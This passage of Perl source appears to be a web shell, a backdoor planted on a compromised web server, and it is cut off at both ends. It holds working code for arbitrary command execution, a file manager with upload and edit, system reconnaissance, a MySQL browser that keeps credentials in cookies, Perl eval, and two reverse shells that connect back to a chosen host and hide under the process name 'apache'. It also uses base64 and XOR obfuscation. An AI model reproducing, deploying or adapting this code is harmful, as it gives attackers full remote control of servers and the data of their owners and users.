value=$CurrentDir><input type=text size=20 name=chmod value=$Fchmod><input type=hidden name=path value=".$_[0]."><input type=hidden name=c value=chmod_file><input type=submit value=CHMOD></form></td><td><form name=run method=POST><input type=hidden name=a value=hexdump><input type=hidden name=f value=$TransferFile><input type=hidden name=d value=$CurrentDir><input type=hidden name=path value=$TransferFile><input type=submit value=HEXDUMP></form></td><td><form name=run method=POST><input type=hidden name=a value=download><input type=hidden name=f value=$TransferFile><input type=hidden name=d value=$CurrentDir><input type=hidden name=path value=$TransferFile><input type=submit value=DOWNLOAD></form></td><td><form name=run method=POST><input type=hidden name=a value=view_file><input type=hidden name=d value=$CurrentDir><input type=hidden name=path value=$TransferFile><input type=submit value=VIEW></form></td><td><form name=run method=POST><input type=hidden name=a value=edit_file_path><input type=hidden name=d value=$CurrentDir><input type=hidden name=path value=$TransferFile><input type=submit value=EDIT></form></td>$tabe</td>$tabe</div>";}sub RTP_EDIT{$TransferFile=$ViewF;my $path=$CurrentDir."/".$TransferFile;ft($path);}sub RT{&PrintPageHeader;print "<h1>File operations:</h1>";my $path=$CurrentDir."/".$TransferFile;ft($path);&PrintVar;&PrintPageFooter;}sub Console{&PrintPageHeader;print "<h1>Console:</h1>";print "$div<font style=\"font:9pt Monospace,'Courier New';\"><textarea class=toolsInp2 name=output style='border-bottom:0;margin:0;' readonly>";$Prompt="[$ServerName $CurrentDir]";print "$Prompt</textarea></font>";ConsoleP();&PrintPageFooter;}sub CommandTimeout{if(!$WinNT){alarm(0);print "</xmp>Command exceeded maximum time of$CommandTimeoutDuration second(s).<br>Killed it!";ConsoleP();exit;}}sub file_header{print "<h1>File manager</h1>$div<table width=100% class=main cellspacing=0 cellpadding=0><tr><th width='13px'><input type=checkbox class=chkbx name=ch11 onclick='sall()'></th><th>&nbsp;Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";}sub history{&GetCookies;my $h=$Cookies{'last_command'};my $x=length $h;$h=ha $h;if($x<3500){$h.=$RunCommand."ussr"}else{$h=$RunCommand."ussr"}@last=split(/ussr/,$h);$h=ah $h;print <<END;
+<script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("last_command","$h","","/");</script>
+END
+}sub ExecuteCommand1{if($RunCommand=~ m/^\s*cd\s+(.+)/gis){if(!-r $1){$CurrentDir=~s!\Q//!/!g;$RunCommand="Can't read $1!";chop($CurrentDir=`\n$Command`)}else{$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`)}&PrintPageHeader("c");print "<h1>Console:</h1>$div";$Prompt = $WinNT ? "$OldDir> " : "[$ServerName $OldDir]\$ ";print "<textarea class=toolsInp2 name=output style='border-bottom:0;margin:0;' readonly>$Prompt $RunCommand\n</textarea>";}else{&PrintPageHeader("c");&history;print "<h1>Console:</h1>$div";$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "<textarea class=toolsInp2 name=output style='border-bottom:0;margin:0;' readonly>$Prompt $RunCommand\n";$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);while(<CommandOutput>){$_=~s/(\n|\r\n)$//;print "$_\n";}$|=0;print "</textarea>"}else{print "<textarea class=toolsInp2 name=output style='border-bottom:0;margin:0;' readonly><pre>";print `$Command`;print "</textarea>"}if(!$WinNT){alarm(0);}print "</pre>";}ConsoleP();&PrintPageFooter;}sub ExecuteCommand{my $path=$in{'path'};$CurrentDir=$in{'d'};$CurrentDir=~s!\Q//!/!g;if($RunCommand eq "changedir"){$RunCommand="cd $ChangeDir";}elsif($RunCommand eq "makedir"){$RunCommand="mkdir $MkDir";}elsif($RunCommand eq "makefile"){$RunCommand="touch $MakeFile";}elsif($RunCommand eq "zip"){$RunCommand="tar cfz ".$ZipArch.".tar.gz ".$ZipFile;}elsif($RunCommand eq "unzip"){$RunCommand="tar xfz ".$UnZipArch;}elsif($RunCommand eq "delfile"){$RunCommand="rm ".$DelFile;}elsif($RunCommand eq "deldir"){$RunCommand = "rm -rf ".$DelDir;}elsif($RunCommand eq "chmod_file"){my $tempt=$in{'chmod'};$RunCommand="chmod $tempt $path";}elsif($RunCommand eq "rename_file"){my $rtempt=$in{'rename_file'};$RunCommand="mv $path $CurrentDir/$rtempt";}elsif($RunCommand eq "touch_file"){my $ttempt=$in{'touch_file'};$ttempt=~s!\Q-!!g;$ttempt=~s!\Q:!!g;$ttempt=~s/ //g;my $ar=substr($ttempt,12);my $al=substr($ttempt,0,12);$ttempt=$al.".".$ar;$RunCommand="touch -t $ttempt $path";}if($RunCommand=~m/^\s*cd\s+(.+)/){$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`);&PrintPageHeader("c");file_header();print "<font size=1>";$Prompt=$WinNT?"$OldDir> " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&PrintPageHeader("c");file_header();print "<font size=1>";$Prompt=$WinNT?"$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCommand<pre>";$Command="cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);while(<CommandOutput>){$_ =~ s/(\n|\r\n)$//;print "$_\n";}$|=0;}else{print `$Command`;}if(!$WinNT){alarm(0);}print "</pre>";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub SendFileToBrowser($){open (FILE, $_[0]);local ($/);$file=<FILE>;close (FILE);($f=$_[0])=~m!([^/^\\]*)$!;print "Content-type: application/x-unknown\n";print "Content-Disposition: attachment;filename=".$1."\n";print "Content-Description: File to download\n\n";print $file;}sub SystemInfo{sub langs{$s="which gcc cc perl python php tar zip ruby";$s.=" -U $q{u}"if($q{u});return $s;}sub hdd{$s="df -h";$s.=" -U $q{u}"if($q{u});return $s;}sub hdd1{$s="mount";$s.=" -U $q{u}"if($q{u});return $s;}sub perlv{$s="perl -v";$s.=" -U $q{u}"if($q{u});return $s;}sub phpv{$s="php -v";$s.=" -U $q{u}"if($q{u});return $s;}sub hosts{$s="cat /etc/hosts";$s.=" -U $q{u}"if($q{u});return $s;}sub downloaders{$s="which lynx links wget GET fetch curl";$s.=" -U $q{u}"if($q{u});return $s;}sub httpd{$s="locate httpd.conf";$s.=" -U $q{u}"if($q{u});return $s;}$langs=langs();$httpd=httpd();$hdd1=hdd1();$hdd=hdd();$perlv=perlv();$phpv=phpv();$hosts=hosts();$downloaders=downloaders();&PrintPageHeader("c");print "<h1>System information</h1>";print "$div1$tab<tr><td><span>OS version:</span>$div1";P(`cat /proc/version`);print "$dive</td></tr><tr><td><span>Distr name:</span>$div1";P(`lsb_release -a`);print "$dive</td></tr><td><span>HDD[mount]:</span>$div1";P(`$hdd1`);print "$dive</td><td><span>HDD[df -h]:</span>$div1";P(`$hdd`);print "<tr><td><span>PATHS:</span>$div1";P(`$langs`);print "$dive</td><td><span>DOWNLOADERS:</span>$div1";P(`$downloaders`);print "$dive</td></tr><tr><td><span>PERL version:</span>$div1";P(`$perlv`);print "$dive</td><td><span>PHP version:</span>$div1";P(`$phpv`);print "$dive</td></tr><tr><td><span>/etc/hosts:</span>$div1";P(`$hosts`);print "$dive</td><td><span>httpd.conf:</span>$div1";P(`$httpd`);print "$dive</td></tr>$tabe$dive";&PrintPageFooter;}sub sql_loginform{print "<h1>DataBases manager</h1>";&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};if(!$hhost){$hhost='localhost'};if(!$pport){$pport='3306'};if(!$usser){$usser='root'};print <<END;
+<form name='sf' method='post'><table cellpadding='2' cellspacing='0'><tr><td>Type</td><td>Host</td><td>Port</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr><td><select name='type' id='nname'><option value='mysql' selected>MySql</option><option value='pgsql'>PostgreSql</option></select></td><td><input type=text name=sql_host value=$hhost></td><td><input type=text name=sql_port value=$pport></td><td><input type=text name=sql_login value=$usser></td><td><input type=text name=sql_pass value=$passs></td><td><input type=text name=sql_db value=$dbb></td><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="sql_connect"><td><input type=submit value='>>'></td></tr>$tabe</form><br><script>document.getElementById('nname').focus();</script>
+END
+}sub sql{use DBI;&PrintPageHeader("p");sql_loginform();sql_query_form();&PrintVar;&PrintPageFooter;}sub sql_vars_set{$hhost=$in{'sql_host'};$pport=$in{'sql_port'};$usser=$in{'sql_login'};$passs=$in{'sql_pass'};$dbb=$in{'sql_db'};}sub sql_query_form{ print <<END;
+$tab<td><span>Current query:</span></td><td><form name='querys' method='post'><textarea name='query' cols=70 style='width:100%;height:60px'>$zapros</textarea><br/><input type=submit value='Query'><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="sql_query"></form></td>$tabe$tabe
+END
+}sub sql_cq_form{print <<END;
+$tab<td><span>Get data from columns:</span></td><td><form name='cquerys' method='post'><textarea name='cquery' id='cquery' cols=40 style='width:100%;height:60px'></textarea><br/><input type="hidden" name="a" value="sql_query"><input type="hidden" name="d" value="$CurrentDir"><input type=submit value='Query'></form></td>
+END
+}sub sql_databases_form{print '<tr><form method=post name=dd'.$$ref[0].'><input type="hidden" name="a" value="sql_databases"><input type=hidden name=database value='.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'"><td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><a href="javascript:document.dd'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td></form></tr>';}sub sql_tables_form {print '<tr><form method=post name=tt'.$$ref[0].'><input type="hidden" name="a" value="sql_tables"><input type=hidden name=table value='.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'"><td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><a href="javascript:document.tt'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td></form></tr>';}sub sql_columns_form{print '<script>function lol'.$s4et.'(f){if(f.checked){var cn=document.getElementById("cquery").value;if(cn!==""){document.cquerys.cquery.value=cn+","+f.id;}else{document.cquerys.cquery.value=f.id;}}else{exit;}}</script><tr><form method=post name=cc'.$$ref[0].'><input type="hidden" name="a" value="sql_columns"><input type=hidden name=column value='.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><input type=checkbox id='.$$ref[0].' name=c'.$$ref[0].' onClick="lol'.$s4et.'(this.form.c'.$$ref[0].')"></td><td><a href="javascript:document.cc'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.$$ref[0].'</font></a></td></form><tr>';}sub sql_data_form {print '<tr><form method=post name=dt'.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'"><td>'.$verd.'['.$s4et.'] </font></td><td>'.$verd.$$ref[0].'</font></td></form></tr>';}sub NetPrint{&PrintPageHeader("p");NetForm();&PrintPageFooter;}sub NetForm {$rip = $ENV{'REMOTE_ADDR'};print <<END;
+<h1>Back-connect</h1>$div<form name='nfp' method=post><span>/bin/sh no tty</span><br>Server: <input type='text' name='server' value=$rip> Port: <input type='text' name='ppport' value=31337><input type="hidden" name="a" value="net_go"><input type=submit value='>>'></form></div>
+$div<form name='nfp' method=post><span>/bin/bash with tty</span><br>Server: <input type='text' name='server' value=$rip> Port: <input type='text' name='ppport' value=31337><input type="hidden" name="a" value="net_go1"><input type=submit value='>>'></form></div>
+END
+&PrintVar;}sub back{$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname("tcp");socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system("/bin/sh -i");close(STDIN);close(STDOUT);close(STDERR);}sub back1{use Fcntl;my $TIOCGPTN=-2147199952;my $TIOCSPTLCK=1074025521;my $EAGAIN=11;my $HOST=$target;my $PORT=$port;$0="apache";my $sock=new IO::Socket::INET(PeerAddr=>$HOST,PeerPort=>$PORT,Proto=>'tcp',Blocking=>0);sysopen(PTMX,'/dev/ptmx',O_RDWR|O_NONBLOCK);my $tmp='';ioctl(PTMX,$TIOCGPTN,$tmp);my $pts=unpack('i',$tmp);my $unlock=pack('i',0);ioctl(PTMX,$TIOCSPTLCK,$unlock);chdir '/';open STDIN,'/dev/null';umask 0;defined(my $pid=fork);exit if $pid;defined($pid=fork);if(!$pid){exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or exec("/bin/bash </dev/pts/$pts >/dev/pts/$pts 2>/dev/pts/$pts");exit;}open STDOUT,'>>/dev/null';open STDERR, '>>/dev/null';my $pp=PTMX;$rin=$win=$ein='';vec($rin,fileno($pp),1)=1;vec($rin,fileno($sock),1)=1;select $sock;$|=1;select PTMX;$|=1;select STDOUT;$|=1;my $finished=0;sub forwarddata{my($from,$to)=@_;while(1){my $rv=sysread($from,$buff,1024);last if(!defined($rv)&& $!==$EAGAIN);defined($rv);if ($rv==0){$finished=1;last;}while(length $buff>0){$rv=syswrite($to,$buff,length $buff);if(!defined($rv)&&$!==$EAGAIN){next;}defined($rv);last if($rv==length $buff);substr($buff,0,$rv)='';}}}while(!$finished){my $nfound=select($rout=$rin,$wout=$win,$eout=$ein,undef);die $! if($nfound==-1);forwarddata($pp,$sock);last if $finished;forwarddata($sock,$pp);last if $finished;}close PTMX;close $sock;$wout=$eout.$wout.$rout;}sub NetGo{&PrintPageHeader("c");$target=$in{'server'};$port=$in{'ppport'};NetForm();back();&PrintPageFooter;}sub NetGo1{&PrintPageHeader("c");$target=$in{'server'};$port=$in{'ppport'};NetForm();back1();&PrintPageFooter;}sub EvalCodePrint{&PrintPageHeader("p");EvalCodeForm();&PrintPageFooter;}sub EvalCodeForm{print <<END;
+<h1>Execution PERL-code</h1><form name=pf method=post><textarea name=code class=bigarea id=PerlCode></textarea><input type="hidden" name="a" value="eval_code"><input type=submit value=Eval style="margin-top:5px">
+END
+}sub EvalCode{&PrintPageHeader("c");EvalCodeForm();$ccode=$in{'code'};print "<br>Result:<br>";eval $ccode;&PrintPageFooter;}sub EditFilePathForm {print <<END;
+<code><br><form name=pfsd method=post>$Prompt<input type="text" name=path id=edit1_file><input type="hidden" name="a" value="edit_file_path"><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=MakeDir></form></code>
+END
+}sub EditFilePath{$fpath="";$fpath=$CurrentDir."/".$ViewF;EditFilePrint();}sub EditFilePrint{&PrintPageHeader("p");EditFileForm();&PrintPageFooter;}sub EditFileForm{open(FILE, $fpath);@file=<FILE>;$fccodde=HtmlSpecialChars(join('', @file));print '<h1>File tools:</h1>';&RTP_EDIT;print <<END;
+<div class=content><form name=pf11 method=post><textarea name=ccode class=bigarea id=editfile>$fccodde</textarea><input type="hidden" name="a" value="edit_file"><input type=hidden name=path value=$fpath><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=Save style="margin-top:5px"></form></div>
+END
+&PrintVar;&PrintPageFooter;}sub ViewFile{$fpath=$CurrentDir."/".$ViewF;&PrintPageHeader("c");open(FILE,$fpath);@file=<FILE>;$fccodde=join('',@file);$fccodde=HtmlSpecialChars($fccodde);print '<h1>File tools:</h1>';&RTP_EDIT;print decode_base64("PHNjcmlwdD5mdW5jdGlvbiBjb2xvcihjb2RlKXt2YXIgcz1bXTt2YXIgYz0iJyI7cmV0dXJuIGNvZGUucmVwbGFjZSgvXGIoY2FzZXxjYXRjaHxjb250aW51ZXxkb3xlbmRkb3xlbHNlfGVsaWZ8ZWxzZWlmfGlmZGVmfGlmbmRlZnxlbmRpZnxmb3J8Zm9yZWFjaHxpZnxmaXxzd2l0Y2h8dHJ5fHR5cGVvZnx3aGlsZXx3aXRofGJyZWFrfGluY2x1ZGV8cmVxdWlyZXxyZXF1aXJlX29uY2V8Zm9wZW58ZnB1dHN8ZnJlYWR8ZmlsZV9nZXRfY29udGVudHN8ZmlsZV9wdXRfY29udGVudHN8cHJlZ19yZXBsYWNlfGltcG9ydHxleGNlcHR8ZGVmaW5lfGRlZmluZWR8dW5kZWYpXGIvZ2ltLCc8c3Bhbj4kMTwvc3Bhbj4nKS5yZXBsYWNlKC8oe3x9KS9naW0sJzxzcGFuPiQxPC9zcGFuPicpLnJlcGxhY2UoL1xiKGZ1bmN0aW9ufHN1YnxkZWZ8dm9pZHxpbnR8cmV0dXJufGV2YWx8YXNzZXJ0fGV4ZWNsfGV4ZWN2fGV4ZWN2ZXxleGVjfGV4ZWNwfGRpZVwoXCkpXGIvZ2ltLCc8Yj48Zm9udCBjb2xvcj0jMDBmZmZmPiQxPC9mb250PjwvYj4nKS5yZXBsYWNlKC9cYihzdHJ1Y3R8ZXhpdHxjbGFzc3xzeXN0ZW18cHJpbnR8cHJpbnRmfGVjaG98c3ByaW50ZnxmcHJpbnRmfHZhclxzKVxiL2dpbSwnPGI+JDE8L2I+JykucmVwbGFjZSgvXGIoMHhbXGRhLXpdK3xcZCspXGIvZ2ltLCAnPGZvbnQgY29sb3I9I2ZmYTA3YT4kMTwvZm9udD4nKS5yZXBsYWNlKC8oXFx4W1xkYS16XSopL2dpbSwgJzxmb250IGNvbG9yPSNmZmEwN2E+JDE8L2ZvbnQ+JykucmVwbGFjZSgvXGIoaHR0cFw6XC9cLypcLz98aHR0cHNcOlwvXC8qXC8/fGZ0cFw6XC9cLypcLz8pXGIvZ2ltLCc8dT48Zm9udCBjb2xvcj0jZmFmYWQyPiQxPC91PjwvZm9udD4nKS5yZXBsYWNlKC8oIi4qPyJ8Jy4qPycpL2csJzxmb250IGNvbG9yPSNmYWZhZDI+JDE8L2ZvbnQ+JykucmVwbGFjZSgvKFwvXCouKlwqXC98XC9cLy4qKS9naW0sJzxmb250IGNvbG9yPSM2OTY5Njk+JDE8L2ZvbnQ+JykucmVwbGFjZSgvKFwvXCpbXHNcU10qP1wqXC8pL2dpbSwnPGZvbnQgY29sb3I9IzY5Njk2OT4kMTwvZm9udD4nKS5yZXBsYWNlKC8oXiMuKiQpL2dpbSwnPGI+PGZvbnQgY29sb3I9IzY5Njk2OT4kMTwvZm9udD48L2I+JykucmVwbGFjZSgvKFwkW19hLXowLTldKikvZ2ltLCc8Yj48Zm9udCBjb2xvcj0jOThmYjk4PiQxPC9mb250PjwvYj4nKS5yZXBsYWNlKC88cihcZCspPi9naW0sZnVuY3Rpb24obWF0Y2gsaWQpe3ZhciByPXNbaWQtMV07dmFyIGNzcz1yLm1hdGNoKC9eKFwvXC98XC9cKnwtKS8pPydjb21tZW50JzpyLm1hdGNoKC9eWyYnXS8pPydzdHJpbmcnOidyZWdleHAnO3JldHVybiAnPHNwYW4gY2xhc3M9IicrY3NzKyciPicrcisnPC9zcGFuPic7fSl9O2Z1bmN0aW9uIGNoYW5nZVRleHQoKXt2YXIgYT1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY2Njb2RlZScpLmlubmVySFRNTDthPWNvbG9yKGEpO2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjY2NvZGVlJykuaW5uZXJIVE1MPWE7fTwvc2NyaXB0Pg==");
+print"<div class=content><pre class=ml1 id='cccodee'>$fccodde</pre></div>";&PrintVar;&PrintPageFooter;}sub HEXDUMP{$fpath=$CurrentDir."/".$ViewF;&PrintPageHeader("c");$fccodde=`hexdump -C $fpath`;$fccodde=HtmlSpecialChars($fccodde);print '<h1>File tools:</h1>';&RTP_EDIT;print"<div class=content><pre class=ml1 id='cccodee'>$fccodde</pre></div>";&PrintVar;&PrintPageFooter;}sub EditFile {&PrintPageHeader("c");$fccode=$in{'ccode'};$ffpath=$in{"path"};print <<END;
+<h1>File: $ffpath saved</h1><form name=pf11 method=post><textarea name=ccode class=bigarea id=editfile>$fccode</textarea><input type="hidden" name="a" value="filemanager"><niput type=hidden name=path value=$ffpath><input type="hidden" name="ddd" value="$ViewF"><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=Files style="margin-top:5px"></form>
+END
+open(FFF,"> $ffpath");print FFF DeHtmlSpecialChars($fccode);close(FFF);&PrintVar;&PrintPageFooter;}sub jquery{print '<script>document.querys.query.value="'.$zapros.'";</script>';}sub sql_columns{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$column=$in{'column'};print <<END;
+<script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("column","$column","","/");</script>
+END
+print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td>$tab<td>";$zapros="SHOW TABLES FROM $dbb";sql_cq_form();print "</td><td>";sql_query_form();print "$tabe</td>$tabe";$s4et=0;$sth=$dbh->prepare($zapros);$sth->execute;print $tabe;print "<b>Tables from $dbb:</b><br><table border=1 cellspacing=0 cellpadding=1 cols=4><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$sth->finish;print "$tabe</td><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";$s4et=0;$sth=$dbh->prepare("show columns from $table from $dbb");$sth->execute;while($ref=$sth->fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth->finish;print "$tabe</td>";$s4et=0;$zapros="SELECT $column FROM `".$dbb."`.`".$table."` LIMIT 0,30";jquery();$sth=$dbh->prepare($zapros);$sth->execute;print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_data_form();}$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe</td>$tabe";&PrintPageFooter;}sub sql_tables{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$qqquery=$in{'table'};print <<END;
+<script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("table","$qqquery","","/");</script>
+END
+print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare('SHOW DATABASES');$sth->execute;print "<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding=1>";jquery();while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td>$tab<td>";sql_cq_form();print "</td><td>";sql_query_form();print "</td>$tabe</td>$tabe";$s4et=0;$sth=$dbh->prepare("SHOW TABLES FROM $dbb");$sth->execute;print "<b>Tables from $dbb:</b><br><table border=1 cellspacing=0 cellpadding=1 cols=4><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$sth->finish;print "$tabe</td><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";$s4et=0;$zapros="SHOW COLUMNS FROM `$qqquery` FROM `$dbb`";jquery();$sth=$dbh->prepare($zapros);$sth->execute;while($ref=$sth->fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe</td>$tabe";&PrintPageFooter;}sub sql_databases{sql_vars_set();&PrintPageHeader("c");sql_vars_set();sql_loginform();$ddb=$in{'database'};print <<END;
+<script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("dbb","$ddb","","/");</script>
+END
+print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth = $dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td>$tbb>";sql_query_form();print "$tabe</td>$tabe";$s4et=0;$zapros="SHOW TABLES FROM `$ddb`";jquery();$sth=$dbh->prepare($zapros);$sth->execute;print "$tabe";print "<b>Tables from $ddb:</b><br>";print "<table border=1 cellspacing=0 cellpadding=1 cols=10>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe";&PrintVar;&PrintPageFooter;}sub sql_set_cookie{print "Set-Cookie: hhost=$hhost;\n";print "Set-Cookie: pport=$pport;\n";print "Set-Cookie: usser=$usser;\n";print "Set-Cookie: passs=$passs;\n";print "Set-Cookie: dbb=$dbb;\n";}sub sql_query{sql_vars_set();&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$qquery=$in{'cquery'};if($qquery){$qquery="SELECT CONCAT_WS(0x3a,$qquery) FROM `$dbb`.`$table` LIMIT 0,30";}else{$qquery=$in{'query'};}$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print "$verd<table width=100% cellspacing=0 cellpadding=1 cols=2><b>DATABASES:</b><td><table border=1 cellspacing=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td>$tbb>";sql_query_form();print "$tabe</td>$tabe";$s4et=0;$sth=$dbh->prepare($qquery);$sth->execute;print "<b>Results:</b><br>";print "<table border=1 cellspacing=0 cellpadding=1 cols=10>";while($ref=$sth->fetchrow_arrayref){$s4et++;print "<tr><td>$verd [$s4et]</font></td><td>".$verd.$$ref[0]."</font></td></tr>";}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe";print '<script>document.querys.query.value="'.$qquery.'";</script>';&PrintVar;&PrintPageFooter;}sub sql_connect{sql_vars_set();sql_set_cookie();&PrintPageHeader("c");sql_loginform();sql_vars_set();$s4et=0;$dbb="";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);if($hhost && $pport && $usser && $passs){$zapros="SHOW DATABASES";jquery();$sth=$dbh->prepare($zapros);$sth->execute;print "$verd $tbb<b>DATABASES:</b><td><table border=1 cellspacing=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td>";sql_query_form();print "</td>$tabe";$rc = $dbh->disconnect;print '</font>';return;}print "Some error...</font>";&PrintVar;&PrintPageFooter;}sub UploadFile{if($TransferFile eq ""){&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;&PrintFileUploadForm;&PrintPageFooter;return;}&PrintPageHeader("c");file_header();print "<font size=1>Uploading $TransferFile to $CurrentDir...<br>";chop($TargetName) if($TargetName = $CurrentDir) =~ m/[\\\/]$/;$TransferFile =~ m!([^/^\\]*)$!;$TargetName .= $PathSep.$1;$TargetFileSize = length($in{'filedata'});if(open(UPLOADFILE, ">$TargetName")){binmode(UPLOADFILE) if $WinNT;print UPLOADFILE $in{'filedata'};close(UPLOADFILE);print "Transfered $TargetFileSize Bytes.<br>";print "File Path: $TargetName<br>";}else{print "Failed: $!<br>";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub Remove{use Cwd qw(abs_path);my $path=abs_path($0);system("rm $path");}&ReadParse;&GetCookies;$ScriptLocation=$ENV{'SCRIPT_NAME'};$ServerName=$ENV{'SERVER_NAME'};$LoginPassword=$in{'p'};sub encr{my($str,$pwd)=@_;$pwd=encode_base64($pwd);$str=decode_base64($str);my $strlen=length $str;my $enc_chr="";my $enc_str="";my $i=0;my @chars=split(//, $str);my @chars1=split(//, $pwd);while($i<$strlen){for($j=0;$j<44;$j++){$enc_chr=chr(ord($chars[$i])^ord($chars1[$j]));$enc_str.=$enc_chr;$enc_chr="";$i++;if($i>=$strlen){return decode_base64($enc_str);}}}return 